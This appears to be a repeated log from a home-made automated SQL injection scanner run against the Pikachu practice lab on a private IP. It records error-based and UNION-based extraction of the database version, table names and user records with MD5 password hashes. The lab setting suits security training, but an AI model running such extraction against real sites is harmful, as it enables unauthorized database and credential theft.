
============================================================
SQL注入扫描会话 - 开始时间: 2025-10-30 14:52:09
扫描目标: http://192.168.232.128/pikachu/vul/sqli
============================================================

[+] 连接成功！

============================================================
SQL注入扫描会话 - 开始时间: 2025-10-30 14:52:12
扫描目标: http://192.168.232.128/pikachu/vul/sqli
============================================================

==============================
Pikachu SQL注入自动化扫描器
==============================
[+] 连接成功！
[+] 使用用户提供的URL: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[+] 自动判断: 搜索型注入, HTTP方法: GET

==============================
测试 搜索型注入
==============================

[*] 开始测试搜索型注入...
[!] 搜索型注入 - 发现基于错误的SQL注入漏洞！数据库类型: MySQL
[*] 正在判断字段数...
[*] 字段数可能 >= 1
[*] 字段数可能 >= 2
[*] 字段数可能 >= 3
[+] 判断出字段数为: 3
[*] 尝试使用UNION查询提取数据...
[*] 正在检测数据输出位置...
[+] 成功检测到输出位置，找到 1 个可能的数据输出点
[+] UNION查询成功，开始提取数据...
[*] 提取数据库信息...
[*] 使用动态生成的正则表达式提取数据库信息...
[*] 使用增强模式识别提取数据库信息...
[+] 数据库信息 (通用模式): pikachu | 5.5.53
[*] 提取数据库表信息...
[*] 使用动态生成的正则表达式提取表信息...
[*] 使用基于特征的模式识别提取表信息...
[*] 使用默认模式提取表信息...
[*] 默认模式匹配失败，尝试其他方法...
[*] 尝试直接在页面文本中查找表名...
所有数据库表名：
users
email
member
[*] 提取用户数据...
[*] 使用动态生成的正则表达式提取用户数据...
[*] 使用基于特征的模式识别提取用户数据...
[*] 使用默认模式提取用户数据...

找到的用户数据 (默认模式):
记录 1, 用户名: vince
记录 1, ID: 1
记录 1, 邮箱: vince@pikachu.com
记录 2, ID: 1
记录 2, 字段 1: admin
记录 2, 字段 2: e10adc3949ba59abbe56e057f20f883e
记录 3, ID: 1
记录 3, 字段 1: pikachu
记录 3, 字段 2: 670b14728ad9902aecba32e22fa4f6bd
记录 4, ID: 1
记录 4, 字段 1: test
记录 4, 字段 2: e99a18c428cb38d5f260853678922e03

[+] 扫描完成！共发现 1 个SQL注入漏洞

============================================================
SQL注入扫描会话 - 开始时间: 2025-10-30 14:56:44
扫描目标: http://192.168.232.128/pikachu/vul/sqli
============================================================

==============================
Pikachu SQL注入自动化扫描器
==============================
[+] 连接成功！
[+] 使用用户提供的URL: http://192.168.232.128/pikachu/vul/sqli/sqli_search.php
[+] 自动判断: 搜索型注入, HTTP方法: GET

==============================
测试 搜索型注入
==============================

[*] 开始测试搜索型注入...
[!] 搜索型注入 - 发现基于错误的SQL注入漏洞！数据库类型: MySQL
[*] 正在判断字段数...
[*] 字段数可能 >= 1
[*] 字段数可能 >= 2
[*] 字段数可能 >= 3
[+] 判断出字段数为: 3
[*] 尝试使用UNION查询提取数据...
[*] 正在检测数据输出位置...
[+] 成功检测到输出位置，找到 1 个可能的数据输出点
[+] UNION查询成功，开始提取数据...
[*] 提取数据库信息...
[*] 使用动态生成的正则表达式提取数据库信息...
[*] 使用增强模式识别提取数据库信息...
[+] 数据库信息 (通用模式): pikachu | 5.5.53
[*] 提取数据库表信息...
[*] 使用动态生成的正则表达式提取表信息...
[*] 使用基于特征的模式识别提取表信息...
[*] 使用默认模式提取表信息...
[*] 默认模式匹配失败，尝试其他方法...
[*] 尝试直接在页面文本中查找表名...
所有数据库表名：
users
email
member
[*] 提取用户数据...
[*] 使用动态生成的正则表达式提取用户数据...
[*] 使用基于特征的模式识别提取用户数据...
[*] 使用默认模式提取用户数据...

找到的用户数据 (默认模式):
记录 1, 用户名: vince
记录 1, ID: 1
记录 1, 邮箱: vince@pikachu.com
记录 2, ID: 1
记录 2, 字段 1: admin
记录 2, 字段 2: e10adc3949ba59abbe56e057f20f883e
记录 3, ID: 1
记录 3, 字段 1: pikachu
记录 3, 字段 2: 670b14728ad9902aecba32e22fa4f6bd
记录 4, ID: 1
记录 4, 字段 1: test
记录 4, 字段 2: e99a18c428cb38d5f260853678922e03

[+] 扫描完成！共发现 1 个SQL注入漏洞

============================================================
SQL注入扫描会话 - 开始时间: 2025-10-30 14:56:48
扫描目标: http://192.168.232.128/pikachu/vul/sqli
============================================================

[+] 连接成功！

============================================================
SQL注入扫描会话 - 开始时间: 2025-10-30 14:57:36
扫描目标: http://192.168.232.128/pikachu/vul/sqli
============================================================

[+] 连接成功！

============================================================
SQL注入扫描会话 - 开始时间: 2025-10-30 14:57:38
扫描目标: http://192.168.232.128/pikachu/vul/sqli
============================================================

==============================
Pikachu SQL注入自动化扫描器
==============================
[+] 连接成功！
[+] 使用用户提供的URL: http://192.168.232.128/pikachu/vul/sqli/sqli_id.php
[+] 自动判断: 数字型注入, HTTP方法: POST

==============================
测试 数字型注入
==============================

[*] 开始测试数字型注入...
[!] 数字型注入 - 发现基于错误的SQL注入漏洞！使用Payload: 1'
[*] 正在判断字段数...
[*] 字段数可能 >= 1
[*] 字段数可能 >= 2
[+] 判断出字段数为: 2
[*] 尝试使用UNION查询提取数据...
[*] 正在检测数据输出位置...
[+] 成功检测到输出位置，找到 1 个可能的数据输出点
[+] UNION查询成功，开始提取数据...
[*] 提取数据库信息...
[*] 使用动态生成的正则表达式提取数据库信息...
[*] 使用增强模式识别提取数据库信息...
[+] 数据库信息 (通用模式): pikachu | 5.5.53
[*] 提取数据库表信息...
[*] 使用动态生成的正则表达式提取表信息...
[*] 使用基于特征的模式识别提取表信息...
[*] 使用默认模式提取表信息...
[*] 默认模式匹配失败，尝试其他方法...
[*] 尝试直接在页面文本中查找表名...
所有数据库表名：
users
email
member
[*] 提取用户数据...
[*] 使用动态生成的正则表达式提取用户数据...
[*] 使用基于特征的模式识别提取用户数据...
[*] 使用默认模式提取用户数据...

找到的用户数据 (默认模式):
记录 1, 用户名: vince
记录 1, 密码: vince@pikachu.com
记录 2, 用户名: admin
记录 2, 密码: e10adc3949ba59abbe56e057f20f883e
记录 3, 用户名: pikachu
记录 3, 密码: 670b14728ad9902aecba32e22fa4f6bd
记录 4, 用户名: test
记录 4, 密码: e99a18c428cb38d5f260853678922e03

[+] 扫描完成！共发现 1 个SQL注入漏洞
